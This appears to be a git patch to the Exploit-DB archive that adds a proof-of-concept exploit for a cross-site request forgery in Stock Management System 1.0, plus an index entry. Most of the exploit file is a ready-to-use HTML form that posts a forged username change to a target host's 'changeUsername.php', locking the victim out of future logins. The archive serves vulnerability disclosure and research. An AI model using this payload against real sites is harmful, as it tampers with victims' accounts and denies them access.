From 4784c1aeb44fd8dc678b186e76cd3fe5b800183c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 3 Sep 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-09-03

1 changes to exploits/shellcodes

Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)
---
 exploits/php/webapps/48783.txt | 28 ++++++++++++++++++++++++++++
 files_exploits.csv             |  1 +
 2 files changed, 29 insertions(+)
 create mode 100644 exploits/php/webapps/48783.txt
diff --git a/exploits/php/webapps/48783.txt b/exploits/php/webapps/48783.txt
new file mode 100644
index 000000000..99d268851
--- /dev/null
+++ b/exploits/php/webapps/48783.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)
+# Exploit Author: Bobby Cooke & Adeeb Shah (@hyd3sec)
+# CVE ID: N/A
+# Date: 2020-09-01
+# Vendor Homepage: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Software Link:   https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
+# Version:         1.0
+# Tested On:       Windows 10 Pro + XAMPP | Python 2.7
+#          CWE-352: Cross-Site Request Forgery (CSRF)
+#  CVSS Base Score: 5.9 | Impact Subscore: 4.2 | Exploitability Subscore: 1.6
+#      CVSS Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:H
+# Vulnerability Description:
+#   Cross-Site Request Forgery (CSRF) vulnerability in 'changeUsername.php' webpage of SourceCodesters 
+#   Stock Management System v1.0 allows remote attackers to deny future logins via changing the 
+#   authenticated victims username when they visit a third-party site.
+
+
+# PoC - Form Method
+#   Change <TARGET-HOST> to target IP address or hostname
+<html>
+  <body>
+    <form action="http://<TARGET-HOST>/stock/php_action/changeUsername.php" method="POST">
+      <input type="hidden" name="username" value="BOKU" />
+      <input type="hidden" name="user_id" value="1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ec8715342..48ccc8c4e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43020,3 +43020,4 @@ id,file,description,date,author,type,platform,port
 48779,exploits/php/webapps/48779.py,"CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)",2020-08-31,"Luis Noriega",webapps,php,
 48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
 48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,
+48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,
